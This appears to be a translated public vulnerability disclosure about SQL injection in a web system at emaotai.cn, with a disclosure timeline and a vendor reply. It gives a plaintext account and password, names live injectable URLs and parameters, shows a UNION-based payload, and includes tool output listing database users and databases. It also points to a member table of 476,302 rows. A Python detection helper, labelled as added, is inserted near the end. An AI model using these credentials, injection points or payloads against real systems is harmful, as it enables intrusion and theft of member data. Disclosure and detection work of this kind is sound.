2015-11-19: Details have been reported to the vendor and are awaiting the vendor's handling
2015-11-24: The vendor has confirmed the issue; details are disclosed to the vendor only
2015-12-04: Details disclosed to core white hats and experts in the relevant field
2015-12-14: Details disclosed to regular white hats
2015-12-24: Details disclosed to intern white hats
2016-01-11: Details disclosed to the public
http://www.emaotai.cn:90/zyd/
Account: wanglei   Password: 123456
SQL injection points submitted via GET:
http://www.emaotai.cn:90/zyd/Sales/XsdEdit.aspx?pjbh=111000100020&ReturnPage=Xsmxz.aspx&op=2
http://www.emaotai.cn:90/zyd/Sales/Xsmxz.aspx?ReturnPage=Xsflz.aspx&spbh=650
http://www.emaotai.cn:90/zyd/Store/Kctz.aspx?ReturnPage=Tzflz.aspx&spbh=18
Injection point submitted via POST (enter a single quote in the search box to find it):
There are many more similar issues; check them yourselves.
Taking
as an example:
Payload: ReturnPage=Xsflz.aspx&spbh=-4455' UNION ALL SELECT CHAR(113)+CHAR(122)+CHAR(118)+CHAR(120)+CHAR(113)+CHAR(66)+CHAR(108)+CHAR(78)+CHAR(99)+CHAR(104)+CHAR(87)+CHAR(106)+CHAR(74)+CHAR(76)+CHAR(83)+CHAR(113)+CHAR(98)+CHAR(107)+CHAR(118)+CHAR(113)--
---
[09:33:34] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows
web application technology: ASP.NET 4.0.30319, ASP.NET
back-end DBMS: Microsoft SQL Server 2008
[09:33:34] [INFO] fetching database users
[09:33:35] [INFO] the SQL query used returns 12 entries
[09:33:35] [INFO] retrieved: ##MS_PolicyEventProcessingLogin##
[09:33:35] [INFO] retrieved: ##MS_PolicyTsqlExecutionLogin##
[09:33:36] [INFO] retrieved: actuser
[09:33:36] [INFO] retrieved: bmDev
[09:33:36] [INFO] retrieved: dev
[09:33:36] [INFO] retrieved: distributor_admin
[09:33:37] [INFO] retrieved: hishop_pj
[09:33:37] [INFO] retrieved: hishop_pj
[09:33:37] [INFO] retrieved: moutaiwssc
[09:33:38] [INFO] retrieved: mysys
[09:33:38] [INFO] retrieved: sa
[09:33:38] [INFO] retrieved: taxreader
database management system users [11]:
[*] ##MS_PolicyEventProcessingLogin##
[*] ##MS_PolicyTsqlExecutionLogin##
[*] actuser
[*] bmDev
[*] dev
[*] distributor_admin
[*] hishop_pj
[*] moutaiwssc
[*] mysys
[*] sa
[*] taxreader
Payload: ReturnPage=Xsflz.aspx&spbh=-4455' UNION ALL SELECT CHAR(113)+CHAR(122)+CHAR(118)+CHAR(120)+CHAR(113)+CHAR(66)+CHAR(108)+CHAR(78)+CHAR(99)+CHAR(104)+CHAR(87)+CHAR(106)+CHAR(74)+CHAR(76)+CHAR(83)+CHAR(113)+CHAR(98)+CHAR(107)+CHAR(118)+CHAR(113)--
---
[09:31:54] [INFO] testing Microsoft SQL Server
[09:31:54] [INFO] confirming Microsoft SQL Server
[09:31:55] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows
web application technology: ASP.NET 4.0.30319, ASP.NET
back-end DBMS: Microsoft SQL Server 2008
[09:31:55] [INFO] fetching database names
[09:31:55] [INFO] the SQL query used returns 18 entries
[09:31:56] [INFO] retrieved: distribution
[09:31:56] [INFO] retrieved: DrpEco
[09:31:56] [INFO] retrieved: drpecosdl
[09:31:56] [INFO] retrieved: DrpEcoTest
[09:31:57] [INFO] retrieved: eAct
[09:31:57] [INFO] retrieved: eActTest
[09:31:57] [INFO] retrieved: emaotai_act_test
[09:31:58] [INFO] retrieved: emaotai_act_test
[09:31:58] [INFO] retrieved: emaotai_logs
[09:31:58] [INFO] retrieved: hishop
[09:31:59] [INFO] retrieved: master
[09:31:59] [INFO] retrieved: model
[09:31:59] [INFO] retrieved: moutai
[09:31:59] [INFO] retrieved: moutaitest
[09:32:00] [INFO] retrieved: msdb
[09:32:00] [INFO] retrieved: ReportServer
[09:32:00] [INFO] retrieved: ReportServerTempDB
[09:32:01] [INFO] retrieved: tempdb
available databases [17]:
[*] distribution
[*] DrpEco
[*] drpecosdl
[*] DrpEcoTest
[*] eAct
[*] eActTest
[*] emaotai_act_test
[*] emaotai_logs
[*] hishop
[*] master
[*] model
[*] moutai
[*] moutaitest
[*] msdb
[*] ReportServer
[*] ReportServerTempDB
[*] tempdb
aspnet_Members is the member table, with 476302 rows; only the first 2 rows are queried here.
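For the defending side, an added detection helper (example code, not from the original report or the vendor) that flags the request shape shown in the payloads above: a quote-broken spbh value followed by UNION ALL SELECT and a CHAR()+CHAR() chain. The log line format and the sample lines are constructed for this example.

```python
import re
from urllib.parse import parse_qsl, unquote

# A quote closing the original string literal, followed by UNION [ALL] SELECT.
UNION_RE = re.compile(r"'\s*union(?:\s+all)?\s+select\b", re.IGNORECASE)
# Three or more CHAR(n) calls joined by '+' (or by spaces, if a literal '+'
# was decoded as a space): the MSSQL string-building idiom used by injection tools.
CHAR_CHAIN_RE = re.compile(r"(?:char\(\d+\)[+\s]+){2,}char\(\d+\)", re.IGNORECASE)


def suspicious_params(query_string):
    """Return the names of query parameters whose decoded value matches either pattern."""
    hits = []
    for name, value in parse_qsl(query_string, keep_blank_values=True):
        # parse_qsl decodes once; decode again so double-encoded payloads are caught.
        decoded = unquote(value)
        if UNION_RE.search(decoded) or CHAR_CHAIN_RE.search(decoded):
            hits.append(name)
    return hits


def scan_log(lines):
    """Yield (client_ip, path, flagged_params) for lines whose query string hits.

    Constructed field order per line: method, path, query string, client IP.
    """
    for line in lines:
        parts = line.split()
        if len(parts) < 4:
            continue  # skip malformed or truncated lines
        path, query, ip = parts[1], parts[2], parts[3]
        params = suspicious_params(query)
        if params:
            yield ip, path, params


# Constructed sample lines. The second carries the report's payload shape
# (spbh broken out of its quotes, UNION ALL SELECT, CHAR() chain), URL-encoded.
SAMPLE_LOG = [
    "GET /zyd/Sales/Xsmxz.aspx ReturnPage=Xsflz.aspx&spbh=650 198.51.100.7",
    "GET /zyd/Sales/Xsmxz.aspx ReturnPage=Xsflz.aspx&spbh=-4455'%20UNION%20ALL%20SELECT"
    "%20CHAR(113)%2BCHAR(122)%2BCHAR(118)%2BCHAR(120)%2BCHAR(113)-- 198.51.100.7",
    "GET /zyd/Store/Kctz.aspx ReturnPage=Tzflz.aspx&spbh=18 203.0.113.9",
]

if __name__ == "__main__":
    for ip, path, params in scan_log(SAMPLE_LOG):
        print(f"{ip} probed {path} via parameter(s) {params}")
```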
You are more professional than I am.
Severity level: Medium
Vulnerability Rank: 8
Confirmation time: 2015-11-24 15:09
Thank you for your feedback; we will handle this bug as soon as possible.
None